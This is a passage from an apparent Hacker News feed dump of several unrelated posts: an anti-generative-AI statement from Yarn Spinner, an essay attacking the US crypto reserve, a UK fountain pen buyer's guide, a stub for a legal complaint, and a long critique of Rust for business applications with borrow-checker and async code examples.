This isn’t merely a technical limitation to be overcome with more data or better algorithms. It’s a fundamental issue: AI systems lack lived experience, cultural understanding, and authentic purpose—all essential elements of meaningful creative work. When humans craft stories, they draw upon personal struggles, cultural tensions, and genuine emotions. AI simply cannot access these wellsprings of authentic creation. It can only simulate their surface patterns, producing work that feels uncanny and hollow—recognisable as creative work in form but not in substance.

Beyond the quality issues, we must confront the ethical problems. These AI systems are trained by scraping millions of human-created works without permission or compensation. They represent a massive appropriation of creative labour—taking without giving back. Using such systems means benefiting from this problematic extraction. It legitimises a model where human creators are exploited rather than valued.

To be crystal clear: Yarn Spinner has absolutely no plans to incorporate generative AI into our products—not now, not ever. We’ve seen the disappointing results these systems produce, and we’ve witnessed their failure to generate narratives with the depth, coherence, and meaning that human writers create naturally. Some suggest AI could have limited applications as tools under human control. But even for these narrow use cases, we remain unconvinced at the moment. The risks of normalising AI in creative processes outweigh any marginal benefits these systems might offer.

What troubles me most is how AI threatens to devalue human creativity by suggesting that the creative process itself—the vision, the intention, the evolution—doesn’t matter. When we pretend an AI can write “good enough” stories, we misunderstand what stories are: not just words arranged in pleasing patterns, but acts of human connection and meaning-making.

Every game narrative created by a human writer carries their unique perspective and intention. Players don’t just experience content; they engage with another human’s vision of the world. No algorithm can provide this human-to-human connection, regardless of how statistically sophisticated its output might be.

The game industry faces a choice between expediency and authenticity. The path of least resistance leads toward automation—replacing human creativity with algorithmic approximations. This path (questionably) promises cost savings but delivers creatively bankrupt experiences. At Yarn Spinner, we build tools that amplify what creative people can do, never tools that attempt to do the creating for them. We respect the creative process too much to automate it away.

As more creative tools rush to integrate AI that produces weak, derivative content, our stance becomes clearer: we stand for authentic human expression in an industry increasingly willing to settle for less. I invite others to join us in drawing this line. Not because we fear technology, but because we’ve seen what AI-generated content actually delivers—and it’s simply not good enough. Human creativity, with all its messiness and brilliance, remains irreplaceable. And that’s something worth protecting, even when—especially when—the technological tide pushes in the opposite direction.


Cover Image by Patrik Houštecký from Pixabay

]]>
https://hey.paris/posts/genai/ hacker-news-small-sites-43237242 Mon, 03 Mar 2025 01:13:51 GMT
<![CDATA[The "strategic reserve" exposes crypto as the scam it always was]]> thread link) | @kolchinski
March 2, 2025 | https://alexkolchinski.com/2025/03/03/the-strategic-reserve-exposes-crypto-as-the-scam-it-always-was/ | archive.org

Today, President Trump announced that the US Government would begin using taxpayer dollars to systematically buy up a variety of cryptocurrencies. Crypto prices shot up on the news.

This is revealing, as crypto boosters have argued for years that cryptocurrency has legitimate economic value as a payment system outside of the government’s purview.

Instead, those same crypto boosters are now tapping the White House for money — in US Dollars, coming from US taxpayers.

Why?

Crypto has been one of the biggest speculative bubbles of all time, maybe the single biggest ever. Millions of retail investors have piled into crypto assets in the hope and expectation that prices will continue to go up. (Notice how much of the chatter around crypto is always around prices, as opposed to non-speculative uses.)

However, every bubble bursts once it runs out of gamblers to put new money in, and it may be that the crypto community believes that that time is near, as they are now turning to the biggest buyer in the world — the US Government — for help.

This shows that all the claims that crypto leaders have made for years about crypto’s value as a currency outside of government control have been self-serving lies all along: the people who have most prominently argued that position are now begging the White House to hand them USD for their crypto.

It also reveals how much crypto has turned into a cancer on our entire society.

In previous Ponzi schemes, the government has often stepped in to defuse bubbles and protect retail investors from being taken in by scammers.

But in this wave, not only has the government not stepped in to stop the scam, it has now been captured by people with a vested interest in keeping it going as long as possible.

Our president and a number of members of his inner circle hold large amounts of cryptocurrency and have a vested interest in seeing its value rise — Trump’s personal memecoin being a particularly notable example. And many other people in the corridors of power in Washington and Silicon Valley are in the same boat. “It is difficult to get a man to understand something, when his salary depends on his not understanding it”, and so some of the most prominent people in the country are now prepared to make any argument and implement any policy decision to boost the value of their crypto holdings.

How does this end?

Once the US taxpayer is tapped out, there’s not going to be any remaining larger pool of demand to keep crypto prices up, and as in every previous speculative bubble, once confidence evaporates, prices will fall, probably precipitously. Unfortunately, as millions of people now have significant crypto holdings, and stablecoins have entangled crypto with fiat currency, the damage to the economy may be widespread.

The end of the crypto frenzy would, in the end, be a good thing. Cryptocurrency has a few legitimate uses, like helping citizens of repressive regimes avoid currency controls and reducing fees on remittances. But it has also enabled vast evil in the world. Diverting trillions of dollars away from productive investments into gambling is bad enough, but the untraceability of crypto has also enabled terrorist organizations, criminal networks, and rogue states like North Korea to fund themselves far more effectively than ever before. I’ve been hearing from my friends in the finance world that North Korea now generates a significant fraction, if not a majority, of its revenues by running crypto scams on Westerners, and that the scale of scams overall has grown by a factor of 10 since crypto became widely used (why do you think you’re getting so many calls and texts from scammers lately?)

I hope that the end of this frenzy of gambling and fraud comes soon. But in the meantime, let’s hope that not too much of our tax money goes to paying the scammers, and that when the collapse comes it doesn’t take down our entire economy with it.

Thanks to Alec Bell for helping edit this essay.

]]>
https://alexkolchinski.com/2025/03/03/the-strategic-reserve-exposes-crypto-as-the-scam-it-always-was/ hacker-news-small-sites-43236752 Mon, 03 Mar 2025 00:08:56 GMT
<![CDATA[The UK Fountain Pens Buyer's Guide]]> thread link) | @susam
March 2, 2025 | https://ukfountainpens.com/the-ukfp-buyers-guide/ | archive.org

Looking for a fountain pen? You’ve come to the right place. Well, one of them. There is no shortage of people on the internet looking to give you advice about which pen to buy.

I’m going to set a few rules of engagement here.

  1. I’m talking about pens that you can buy domestically in the UK, from known manufacturers and known retailers, at common street prices. If you’re reading a buyer’s guide, you’re probably not up for importing or going for completely unknown brands.
  2. I’m going to list out pens that I think are “contenders” in a given category; this will absolutely not be a comprehensive list.
  3. I’ll only comment on pens that I’ve tested or feel that I have a solid opinion on. This will consciously exclude certain brands — I have a deep instinctive loathing for Cross, for some reason, for example. Think I’ve missed something? Write in.
  4. I’ll stop at £250. If you’re spending more than that, you’re either a rich idiot buying your first pen, or you have some experience with pens and can guide yourself to individual reviews to validate the pens you’re interested in. You don’t need a buyer’s guide.

First pen: £10–£20

With the influx of Chinese pens like the Jinhao 992 you can now buy a perfectly serviceable steel-nibbed fountain pen, with converter, for less than a cup of coffee from Starbucks.

The range of models is changing and growing all the time. There are even Japanese pens like the Platinum Preppy under this price range. I’ll say it straight: unless you’re really struggling financially you do not need advice from me about which pen under £5 to get. Buy a couple each month, try them out, give them to kids at your local school.

But, if you’re looking to buy your first pen around £15, it can seem like a big investment. Buy the wrong one and you might have a horrible experience of fountain pens and go back to ballpoints. This decision matters.

The contenders:

Lamy Safari: £18

The default recommendation is one of Lamy’s bright and breezy pens. I’ve never owned a Safari — I jumped straight to the aluminium version, known as the Al Star, which is out of this price range. But I have owned some of Lamy’s other budget offers, all of which use the same nib and basic formula. You have the choice of the Safari in its dozens of plastic colours, but it’s also available in transparent guise as the Vista, in kid-friendly guise as the ABC, and in funky alu+plastic as the Nexx, all in this price range. I’ve always had a good experience with Lamy steel nibs, from extra fine up to broad. Build quality is good, they take very competent converters, and you can pick one up in your local branch of Paperchase for less than £20. In the hand they’re a good size — the only thing you need to figure out is whether you like the triangular-shaped grip.

Kaweco Sport: £18

I really like the Sport design and have two of them at the moment (an Art and Al), but I’ll dismiss the basic one pretty quickly. Unless you are explicitly on the lookout for a “pocket pen”, you’ll probably find the Sport a bad first pen, because it’s quite small (same reason I won’t recommend the Al Sport or the Liliput in later categories). But there are three other reasons to skip over it: first, in my experience Kaweco nib quality control is hit-and-miss, so as a beginner you’re more likely to end up with a pen that doesn’t write well. Second, finding a good converter for the Sport is a bit tricky, and the quicker you get off cartridges into the wonderful world of bottled ink, the better! Third, the nib unit on the basic Sport isn’t swappable, which limits you for all kinds of reasons.

Kaweco Perkeo: £15

The Perkeo is a better choice than the Sport, because it’s larger and — from my experience and others — it has a better nib than the Sport, too. Only downside is that it doesn’t have a clip.

My recommendation:

I’d either go for the Lamy Nexx or the Kaweco Perkeo.

Stepping up: £20–£50

This is where pens get interesting and the choice gets much wider. You’re still in steel-nib territory, of course, but the materials and build quality are superior. This is the sweet spot for many people. One key omission here is the Caran d’Ache 849 — I’ve not tried it because I don’t like how it looks and it’ll be way too narrow for me.

Lamy Al Star or LX: £25+

The LX is overpriced — you’re paying for packaging. The Al Star is a better deal, giving you the Safari experience but with a more robust aluminium shell, which comes in some snazzy colours. I had a beautiful orange one; the Pacific Blue is also lovely.

Lamy Aion: £49

The Aion is built like a tank, beautiful in an understated way, has a proper designer’s name on it, and most importantly writes wonderfully. Mine has one of the best EF nibs I’ve ever used. You could keep this pen in your work bag and never want for another.

TWSBI Eco: £30

To me the Eco is the clear winner in TWSBI’s range. It has none of the fragility of the Classic, the fussiness of the Diamonds, or the difficulty of cleaning that plagues the Vacs. And it’s cheaper than all of them.

You get a stout plastic box with all the tools and instructions you need for disassembly. It comes in a few colour variants, but all with a demonstrator barrel, and the nibs I’ve used (F and B) have been absolutely fantastic. Cleaning is a breeze and the only annoyance you’ll find is people mistaking your pen for a vape.

Faber-Castell Ambition or Loom: £28+

I’ve never owned either of these pens, but I have owned an Ondoro, which has the same nibs. Others say it, and I agree: FC makes some of the best steel nibs out there (although I didn’t like the Ondoro for other reasons). Definitely check these out if you like the styling.

Lamy Studio: £46

This is an unpopular opinion but I don’t much like the Studio. I owned one and enjoyed it, but ultimately sold it. The step-down from barrel to section bothered me. The Aion is ultimately the superior pen.

My recommendation:

At the bottom end of this price range, go for an Eco. If you want something with a bit more weight to it, go for the Aion.

Getting serious: £50–£100

The choice here is getting broad and look, I’ll be honest, there are a lot of pens I haven’t reviewed here. Conklins, Karas, Loclen, Cleo Skribent, Visconti Rembrandt…

Some of the pens I’ve previously mentioned (and dismissed) fall into this category. The Al Sport, Ondoro, TWSBI Vac and Classic, etc. So what follows is ALL NEW.

Tactile Turn Gist: £69+

The Gist is an incredibly well thought-out and innovative design, with a grippy finish, square-cut threads, and interesting material choices. It has a strong clip, long section and tight finishing.

Pelikan M200: £88+

I like big pens but can’t let go of my M205. It’s a nice smooth piston-filler with a wet steel nib. Sure, it’s small and the design is pretty unassuming, but it is just a great writer.

Platinum 3776: £99

YES. At Cult Pens, you can get a 3776 for less than a hundred quid. And that’s including all the crazy special nibs like the ultra extra fine, the soft fine, and the extra broad. You’re getting an in-house gold nib, one of the best around, plus a practical slip-and-seal cap that will keep your ink from drying out. Sure, the 3776 doesn’t feel as premium as some other pens, but it’s an absolute steal.

My recommendation:

For Chrissake, get a Platinum 3776.

Going for gold: £100–£175

At this price range, you have a metric ton of choice. I mean, loads. Just from the pens I’ve reviewed, you’ll find the Karas Decograph, Edison Beaumont (and other models), most of the small Pilots when bought from the UK (91, 92, possibly 912), Ystudio’s metal designs… and then there’s the Waterman Carene, Parker Sonnet, Visconti Van Gogh, Platinum President, Conklin Mark Twain, Graf Tamitio, Diplomat Aero… the list just grows.

If you want to avoid madness, I’d recommend considering just the following:

Lamy 2000: £122+

I won’t pull a cliffhanger here: this is the pen I’d recommend. Every collection deserves a 2000. The design really is the definition of iconic. The Makrolon and stainless steel is classy and comfortable. It’s a piston filler with ink window, the hooded gold nib is wet and smooth, the slip cap practical.

Pilot Capless: £149+

Most people end up at some point wanting and getting a Capless/Vanishing Point, or one of its variations, the slimline Decimo or twisty Fermo. There are a gazillion colours and finishes to choose from. I personally find the modern Vanishing Point design ugly and uncomfortable. Others love it. What’s indisputable is that again, it’s an iconic design and engineering feat, and you get a gold nib.

Pilot 92: £155

A handsome demonstrator, gold-nib piston filler with Pilot build quality. I found it a bit small and a bit dry in the end, but if you want a gold piston filler at this price range, you’ve got a choice of the 2000 or this.

Franklin-Christoph: £125+ (dollar converted)

I’ve owned two Franklin-Christoph pens, and I can’t say enough good things about the inventive materials and innovative designs this small US company produces. Putting giant threads right at the end of the pen is an inspired decision for comfort and distinctiveness. I really like the Pocket 66 and Model 02 designs, but you can take your pick. The only thing to note is that at this price, you’re getting a steel nib. Franklin-Christoph designs not floating your boat? Try Edison for some more traditional styles.

My recommendation:

For Chrissake, get a Lamy 2000.

Topping out: £175–250

Lamy Dialog 3:

Sailor Pro Gear:

Pelikan M400/M600:

]]>
https://ukfountainpens.com/the-ukfp-buyers-guide/ hacker-news-small-sites-43235144 Sun, 02 Mar 2025 21:10:30 GMT
<![CDATA[Passes.com and Lucy Guo accused of distributing child pornography [pdf]]]> thread link) | @cuuupid
March 2, 2025 | https://www.csvllp.com/wp-content/uploads/2025/02/2025.02.26-1-Complaint.pdf | archive.org

Unable to extract article]]>
https://www.csvllp.com/wp-content/uploads/2025/02/2025.02.26-1-Complaint.pdf hacker-news-small-sites-43234686 Sun, 02 Mar 2025 20:27:55 GMT
<![CDATA[Is Rust a good fit for business apps?]]> thread link) | @pjmlp
March 2, 2025 | https://www.bartoszsypytkowski.com/is-rust-a-good-fit-for-business-apps/ | archive.org

While you may hear a lot of harsh words about Rust in this rant, that doesn't have to mean it's a bad language. Rephrasing the classic: there are two types of programming languages: ones that people complain about and ones that nobody uses. I started my journey with Rust in 2018 and I've been working in it full time since 2021.

I love Rust a lot for many things: good std lib abstractions, ergonomics (to some extent), the best build toolchain in the world (I've tried many things, but cargo is easily number one across the programming language landscape). But mostly I love how it brought sanity into systems programming and gave a viable alternative to this hollow abomination called C++ (and CMAKE).

But what do I mean by the term business apps? Nowadays, it's all sorts of services targeting various kinds of user/asset management, be it a bank portal, an online shop or any other sort of ERP system. This also covers ETL to a huge extent, as these apps keep your focus outside of the core concerns that Rust shines in.

These systems usually have similar shell: a web service providing some API, a database to manage system information and all sorts of other service connectors.

These systems are characteristic because their main complexity comes from the domain: it is not hardware or software related, but about modelling the complexities of human interactions in code. Quite often the most performance-sensitive parts relate to I/O access (databases, HTTP communication) and serialization, and are solved by tuning access to the other services we use, not the algorithms we write ourselves.

These systems were famously written in many different languages, from Python/Ruby/JavaScript/PHP to Java/C#/Go. The question is: are business apps a good use case for Rust?

Spoilers: in my opinion, no. Now let's explain why.

Standard library

One of the nice things about Rust is that the abstractions defined in its standard library feel right in size and scope. On the other hand, the std lib itself is woefully lacking: no RNG, cryptography or serialization. Even some things that should have been language features since day one - like async traits and yield generators - are supplied as 3rd party macros.

On the other hand, the Rust package ecosystem is enormous. You have everything, from a universal abstraction over the file system with a dozen services supported, down to a cross-platform Bluetooth driver that you can use to (literally) connect to your butt plug.

While languages such as Go enable you to write pretty much an entire HTTP service from the standard lib alone, this bazaar-style package management comes with a burden: whenever you need to solve any mundane problem, you land in a space where everything has at least 7 different crates available, but half of them are actually toy projects and most of them have not been maintained for the last 5 years. And don't get me started about audits to check whether one of the 600 dependencies of your hello world app won't be used for supply chain attacks.

It takes time and attention to sift the wheat from the chaff. Attention that is limited and could be put to better use elsewhere.

And while many of these concerns make sense in systems programming, since it covers very different environments with very slim-tailored constraints - like WASM in the browser, or embedded devices where even Rust's minimal standard lib is too much - they don't matter so much in the context of business apps, where solid defaults for common problems are desired: which is one of the reasons for Go and .NET popularity in this domain.

Not abstract enough

One of the fantastic parts of Rust is that it managed to - mostly - live up to the credo of zero-cost abstractions: a situation where the performance of your highly abstracted code (e.g. iterator ops or futures) is basically the same as its hand-rolled equivalent.

The problem is that Rust comes with some new concepts like lifetimes and mutability modifiers, that cannot be properly abstracted to the same degree as regular generics.

If you've played with Rust you've probably already seen those different kinds of iterators for mutable/immutable references, which basically have the same implementation but require twice the boilerplate code. The reason why is that mutability is not a generic property in Rust and cannot be abstracted over.
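
To make this concrete, here's a minimal sketch of the duplication; Iter and IterMut are illustrative names, not from any real crate. The two iterators are line-for-line the same logic, yet nothing lets you write them once:

// Immutable variant.
struct Iter<'a, T> {
    slice: &'a [T],
}

impl<'a, T> Iterator for Iter<'a, T> {
    type Item = &'a T;
    fn next(&mut self) -> Option<&'a T> {
        let (first, rest) = self.slice.split_first()?;
        self.slice = rest;
        Some(first)
    }
}

// Mutable variant: the same logic, duplicated with different types.
struct IterMut<'a, T> {
    slice: &'a mut [T],
}

impl<'a, T> Iterator for IterMut<'a, T> {
    type Item = &'a mut T;
    fn next(&mut self) -> Option<&'a mut T> {
        // `take` swaps in an empty slice so we don't borrow `self.slice` twice.
        let slice = std::mem::take(&mut self.slice);
        let (first, rest) = slice.split_first_mut()?;
        self.slice = rest;
        Some(first)
    }
}

fn main() {
    let mut data = vec![1, 2, 3];
    for x in (IterMut { slice: &mut data }) { *x += 1; }
    let doubled: Vec<i32> = Iter { slice: &data }.map(|x| x * 2).collect();
    assert_eq!(doubled, vec![4, 6, 8]);
}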

Some languages, like Pony, offer the ability to control read/write access to fields and variables, but do it in a way that enables safe "casting" between them. PS: I highly recommend learning Pony for its reference capabilities concept alone, which may initially seem more complex than Rust's mutability and borrow-checker, but in practice is much more robust and avoids many pitfalls that Rust has, especially in multi-threaded programming.

Dynamic trait references

Since this rant already came to the topic of abstractions, let's talk about dyn Trait. First, let me praise Rust's decision to explicitly mark, in code, the references responsible for doing a virtual table dispatch.

However Rust also decided to turn Box<dyn Trait>/Arc<dyn Trait> into fat pointers (similar to Go, and opposite to Java/.NET).

Short explanation: unlike Box<T>, which is basically a memory pointer, the memory representation of Box<dyn T> is two pointers - one for the type's virtual table, and one for the heap address where the corresponding object lives. This comes with a few consequences:

  • If you're working with the C foreign function interface, there's no right C primitive to support you. You need to roll out something of your own, which most likely won't be compatible with existing solutions. A bizarre design decision given how important native interop is for Rust.
  • If you want to introduce lock-free mutability via a Compare-And-Swap API (like the one that arc-swap offers) and use dynamics at the same time... well, get fucked. You'll need an extra layer of indirection, since this API is only available for pointer-sized things.
  • Some of the Rust APIs restrict you to working over Sized data - types whose size can be determined at compile time - which unfortunately puts limitations on your generic params, e.g. if you ever want to use them in a Box<T> context (since the box pointer will have a different size depending on what T is).
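
A quick way to observe the fat-pointer layout for yourself; the Shape trait here is just an illustrative placeholder:

use std::mem::size_of;

trait Shape {
    fn area(&self) -> f64;
}

fn main() {
    // A plain Box is a single pointer...
    assert_eq!(size_of::<Box<f64>>(), size_of::<usize>());
    // ...while Box<dyn Trait> carries a second, vtable pointer.
    assert_eq!(size_of::<Box<dyn Shape>>(), 2 * size_of::<usize>());
}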

Rust provides a workaround in the form of dedicated crates that offer thin dynamic pointers as well, but since they are not part of the standard lib, it's unlikely that you'll be able to use them across different libraries in the ecosystem without extra work.

Borrow checker: early adopter syndrome

One of the biggest value propositions of Rust is the borrow checker. If you ever thought about reasons to learn Rust: the borrow-checker and ownership model is the one. It changes the way you think about object graphs.

Rust is probably the first non-esoteric language to adopt a borrow-checker as a regular tool. However, it comes with some drawbacks: at its current stage the borrow-checker is still not very advanced and is extremely conservative, requiring the programmer to do a lot of defensive programming and workarounds in order to make it happy. And most likely it will never be improved beyond minor points, as that would require a breaking change.

In short: you can imagine the borrow-checker as a recursive read/write lock enforced on all fields and variables at the compiler level - at any time you can have multiple read-only references to the same object or one read-write reference, but never a mix of the two. Additionally, in order to have a reference of a given type to a field in an object graph, you need to have the same (immutable/mutable) or stronger (mutable) reference to its parent.

If we think in the category of locks, you can imagine the deadlock problem: A needs to wait for B, and B needs to wait for A, to acquire their corresponding locks. In the Rust borrow-checker, such situations are compiler errors. The same logic is used by Rust to operate on actual locks, but don't worry: it doesn't mean that Rust is a deadlock-free language.

What it means, however, is that there's no easy way to represent cyclic data structures in Rust (here's a description of the famous doubly-linked list problem), since - unlike pretty much any other language - it explicitly disallows you from holding a mutable reference alongside any other reference to the same variable (even in the same thread).

And speaking of cyclic data structures: you can actually sometimes implement them in a straightforward manner with Rc<RefCell<T>>/Arc<Mutex<T>>, but the problem is that:

  1. RefCells can easily blow up, since they work the same way as the borrow-checker but at runtime, while a Mutex can deadlock at runtime. Neither of them is "zero cost".
  2. You need to keep track of references with strong and weak pointers, which is usually not an issue unless your object graph needs to be a bit more complicated for some reason. If you get this wrong, you'll get a memory leak (see the sketch below). One of the Rust promises was to reduce these, but it only works in comparison to traditional "systems" languages like C/C++. This comparison falls apart against managed languages.
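
Here's a minimal sketch of that strong/weak bookkeeping, along the lines of the classic tree example: children are held strongly, parents only weakly, because a strong cycle would never be freed.

use std::cell::RefCell;
use std::rc::{Rc, Weak};

struct Node {
    value: i32,
    parent: RefCell<Weak<Node>>,
    children: RefCell<Vec<Rc<Node>>>,
}

fn main() {
    let root = Rc::new(Node {
        value: 1,
        parent: RefCell::new(Weak::new()),
        children: RefCell::new(Vec::new()),
    });
    let child = Rc::new(Node {
        value: 2,
        parent: RefCell::new(Rc::downgrade(&root)),
        children: RefCell::new(Vec::new()),
    });
    root.children.borrow_mut().push(Rc::clone(&child));

    // If `parent` were an Rc instead of a Weak, root and child would keep
    // each other alive forever - a silent memory leak.
    let parent_value = child.parent.borrow().upgrade().map(|p| p.value);
    assert_eq!(parent_value, Some(1));
}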

I get why it's there, but forcing it blindly and everywhere as the default behaviour is fucking bullshit: which apparently is acknowledged by the authors themselves, since the common way of getting two mutable references into an array is to split it into two separate slices using a method (split_at_mut) that operates on unsafe pointers under the hood. Shout-out to all the haters saying that unsafe Rust is not idiomatic: it's not only idiomatic, it's necessary.

Borrow checker and encapsulation

Another thing about the borrow checker is that it has a very shallow understanding of your code. It also explicitly makes the conservative assumption that if you call a method on some reference, this method may try to access ALL fields of that reference, forcing any other field borrowed outside of it to be invalidated.

Let's check this out on the following example:

use std::collections::HashMap;

// `Entry` is left undefined in the original example; a unit struct stands in
// so the snippet compiles.
struct Entry;

struct X {
    commit_offset: usize,
    entries: HashMap<u32, Vec<Entry>>,
    changed: HashMap<u32, Vec<usize>>,
}

impl X {
    fn change_uncommitted<F>(&mut self, client: &u32, f: F)
        where F: Fn(&mut Entry) -> bool 
    {
        let mut i = self.commit_offset;
        if let Some(entries) = self.entries.get_mut(client) {
            // get iterator over uncommitted entries for given client
            for e in entries.as_mut_slice()[self.commit_offset..].iter_mut() {
                if f(e) {
                    let changed = self.changed.entry(*client).or_default();
                    changed.push(i);
                }
                i += 1;
            }   
        }
    }
}

Now let's try to encapsulate it a little to make it more readable - nothing much, just wrap our cryptic iterator expression in a method to give it some context:

impl X {
	/// get iterator over uncommitted entries for given client
    fn get_uncommitted(&mut self, client: &u32) -> Option<&mut [Entry]> {
        let e = self.entries.get_mut(client)?;
        Some(&mut e.as_mut_slice()[self.commit_offset..])
    }
    
    fn change_uncommitted<F>(&mut self, client: &u32, f: F)
        where F: Fn(&mut Entry) -> bool 
    {
        let mut i = self.commit_offset;
        if let Some(entries) = self.get_uncommitted(client) {
            for e in entries.iter_mut() {
                if f(e) {
                    // compilation failure: get_uncommitted already borrowed
                    // `&mut self` for the scope of the if let, so we cannot
                    // access `self.changed`
                    let changed = self.changed.entry(*client).or_default();
                    changed.push(i);
                }
                i += 1;
            }   
        }
    }
}

The second implementation will fail. Not because it's wrong, not because we broke something (in fact these two implementations are identical), but because it makes the borrow checker sad.

This is in fact a recurring theme: when working in Rust, you'll often find yourself in situations where you need to split your types or methods in a specific way, just because the borrow checker says so. It's mandatory, even when it adds no value to your project (or outright removes it).

Performance ceiling vs time to performance

One of the common misconceptions about Rust is that apps written in Rust are fast simply because they are written in Rust. This is true to some extent if we compare them against dynamic languages like Python, Ruby or JavaScript, but it falls short when we start comparing against services written in e.g. Go, Java or .NET.

This may be due to an oversimplified view of the performance characteristics of real-world apps:

  1. Winning hyper-optimization wars in micro-benchmarks rarely translates to visible results in business apps, where our own code is usually ~10% of what gets executed: the rest is databases, web stacks, serializers etc.
  2. For those apps, most of the optimization is done through proper database and network usage, system architecture and the right algorithm choice. Language wrestling matters a lot less, at least when we talk about languages in the same performance "weight class".

Moreover, picking Rust may cause a let-down in performance expectations - I've seen people write their apps in both Rust and e.g. C# and notice that their C# apps were actually faster. This comes from another issue: on your first try, you'll probably write your Rust app just well enough to make it compile, do the actual task and avoid glaring performance issues. Most likely you'll stick to its defaults and - in a business setting - this will be the last time you try to optimise that piece of code.

This boils down to the difference between:

  • Performance ceiling, which means how fast a program written in a given language can possibly be. This is usually low for dynamic languages (since they abstract a lot) but very high for Rust. However, on some platforms, e.g. .NET or Swift, where we can choose to work closer to the metal if we want to, this difference is not that significant.
  • Time to performance, which basically means: "how long it takes to solve a problem with acceptable performance". And personally: Rust falls behind many managed languages on that metric, mainly because of things like the borrow checker and the multi-threading issues which I cover later.

Your business app will probably be working with things like strings, byte buffers and object graphs to carry business data between the DB and the web framework. This means it will move and copy a lot of data around: something that the default Rust primitives are not particularly great at, e.g. String::clone in Rust does a deep copy (where in managed languages it's just a pointer copy), while String itself is just a wrapper around a capacity-bound Vec<u8>, which means strings may also be bigger than they need to be.
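
A trivial illustration of the String::clone point (the string contents are made up):

fn main() {
    let order_note = String::from("customer asked for gift wrapping");

    // clone() allocates a fresh buffer and memcpys every byte; in a
    // language with a tracing GC the equivalent assignment would just
    // copy a pointer.
    let audit_copy = order_note.clone();
    assert_eq!(order_note, audit_copy);
}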

Copying "references" can also be much more expensive than in languages with a tracing garbage collector, because of reference counting: e.g. copying a Vec<Arc<T>> means not only a memcpy over the vector's heap space but also incrementing the ref counter in every one of the nested Arc pointers (including loading each of them from the heap into a register and coordinating the new counter values between CPU caches).

And since we're at Arc/Rc or even Box: once you need to deal with graphs of objects or move data between coroutines or threads, you'll see yourself using them quite a lot. The problem is that this style of allocation is nowhere near as fast as the bump-pointer allocators that managed languages use. The actual win is when we need to release memory, which in Rust doesn't introduce GC pauses. However, modern runtimes, e.g. Go or Java's Z collector, can provide constrained GC pauses that let us keep latency in check and avoid pathological cases (which is fine for most business apps, except maybe the HFT space). Moreover, they can offload memory release to background threads, which is not the case in Rust and which, for big object graphs, can also affect latency.

And while technically Rust's memory footprint would be expected to be lower, in practice that doesn't have to be the case (because of all the deep copying of heap objects and the fact that many Rust pointers are pinned, causing fragmentation).

Rust is NOT good for multi-threaded apps

Some developers like to claim that - thanks to its strict borrow checker - Rust makes multi-threaded programming safe and reliable. This statement could probably hold in comparison against languages like C/C++, but once again it easily falls apart once you compare Rust against any of the contenders we've already described.

.await pain

The first problem is that building multi-threaded apps in Rust is simply painful. 2/3 of this pain comes from the fact that if you ever have to do it, you'll most probably be put to work with async/await and the tokio runtime.

Once you need to work with Rust futures and async code, you'll get exposed to a whole new world of micro-complexities dosed straight into your brain, e.g.:

  • How you cannot just access objects and their fields, but have to work with pinning and Unpin.
  • How to build async iterators: because while async_stream is there, from time to time you'll have to roll something by hand, and it's a much harder process than in any other language supporting this feature that I know of.
  • Differences between regular threads/locks, and their asynchronous equivalents.
  • Why the hell do you need async_trait and why it's even configurable.
  • How Send and Sync makes each of the issues above exponentially harder than they already are.
  • And how the fact that you have pluggable runtimes - and sometimes need to use more than one in your app, e.g. tokio+rayon - makes things even more interesting.

I think that this blog post is a good critique of the current state of async Rust.

If you're going to pass your objects across threads, Rust forces some constraints on the code you're writing - such as the Send + 'static bounds - even if that code is executed in only a single execution scope at a time. The problem is that in tokio - the dominant runtime in the Rust ecosystem - the primary way of parallelizing work is via the spawn method, which uses a work-stealing scheduler: it moves suspended executions from busy to idle threads as it sees fit. This usually requires ensuring that most of your async code base is Send + 'static compatible.
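
A small sketch of how this bites, assuming tokio as a dependency: the commented-out Rc version fails to compile because tokio::spawn demands Send + 'static, and the stock answer is to reach for Arc.

use std::sync::Arc;

#[tokio::main]
async fn main() {
    // An Rc here would make the future !Send and fail to compile:
    //
    //     let data = std::rc::Rc::new(42);
    //     tokio::spawn(async move { println!("{data}") }); // error: Rc is !Send
    //
    // tokio::spawn requires Send + 'static because the work-stealing
    // scheduler may resume the future on a different thread:
    let data = Arc::new(42);
    let handle = tokio::spawn(async move {
        println!("{data}");
    });
    handle.await.unwrap();
}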

What's nice about the Send and Sync traits is that they are inferred from the bodies of the async methods you implement. What's not nice is that they are not immediately visible, so you may accidentally break API guarantees by changing a few lines somewhere down a method call stack without even noticing, resulting in your methods no longer being forkable by tokio::spawn.

Locks. Locks everywhere.

In practice, all of the Send + 'static constraints mentioned above mean that all kinds of shared data now need to be wrapped in Arc<Mutex<T>>/Arc<RwLock<T>>. But which mutexes and locks are we talking about?

  • Since std::sync::RwLock is basically a wrapper around OS primitives, it is very heavy. Most notably it doesn't offer an async/await API, so it's going to block threads from the tokio thread pool, which is damaging for server performance.
  • parking_lot::RwLocks are much more lightweight - they use optimistic locking with atomic counters. They still don't offer an async/await API though, potentially blocking the thread pool in the process.
  • futures_locks::RwLock sounds like a good idea if you aim for runtime-agnostic async locks, until you look into the implementation and realize that it's just bait and the whole thing uses regular locks inside.
  • Tokio has its own RwLock, which offers an async/await API (a short usage sketch follows this list), but it comes with some caveats, like:
    • If you use its blocking lock methods inside a context in which the tokio runtime is available, it will straight up panic, crashing your app. And sometimes you may have to call it in a context where the runtime is available but your code cannot be async, calling for another layer of workarounds.
    • It doesn't offer reentrancy or upgradeable locks (promoting read locks into write ones).
  • Finally async_lock::RwLock, which offers an async/await API, an optimal implementation, lock upgrades, and doesn't crash your server because the author didn't like the way you're using his library. PS: don't worry, I don't like it either, but I'm here to do what I can with what I have at hand, not to write poetry.
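
For reference, here's roughly what the tokio variant looks like in use - a hedged sketch, assuming tokio as a dependency:

use std::sync::Arc;
use tokio::sync::RwLock;

#[tokio::main]
async fn main() {
    let shared = Arc::new(RwLock::new(Vec::<u32>::new()));

    let writer = {
        let shared = Arc::clone(&shared);
        tokio::spawn(async move {
            // .write().await yields to the runtime instead of blocking
            // a thread-pool thread while waiting for the lock.
            shared.write().await.push(1);
        })
    };
    writer.await.unwrap();

    let guard = shared.read().await;
    assert_eq!(*guard, vec![1]);
    // Beware: the blocking variants (blocking_read/blocking_write) panic
    // when called from inside the runtime, as described above.
}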

So once you finally get your PhD in Rust lock algorithms, you're finally at the level where you can do the job as efficiently as a Go dev after learning the whole language in 2 hours. And God forbid you ask yourself the question: why do I need to use locks if this code is never accessed concurrently?

